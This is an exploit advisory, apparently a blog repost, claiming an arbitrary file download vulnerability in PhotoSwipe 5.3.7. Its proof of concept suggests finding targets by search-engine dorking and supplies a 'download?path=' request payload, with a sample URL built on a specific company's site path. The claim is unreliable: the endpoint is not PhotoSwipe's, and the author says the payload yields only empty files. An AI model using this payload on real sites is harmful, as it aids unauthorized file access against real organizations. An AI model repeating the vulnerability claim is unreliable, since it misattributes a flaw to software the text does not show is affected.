PhotoSwipe 5.3.7 Arbitrary File Download

渗透技巧 11个月前 admin

206 0 0

===========================================================================================
| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    |
| # Author    : indoushka                                                                 |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | 
| # Vendor    : https://photoswipe.com/                                                   |  
| # Dork      :                                                                           |
===========================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use Payload : download?path=/uploads/images/support/download/index.php

[+] Payload enables you to download empty files .

[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.php

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet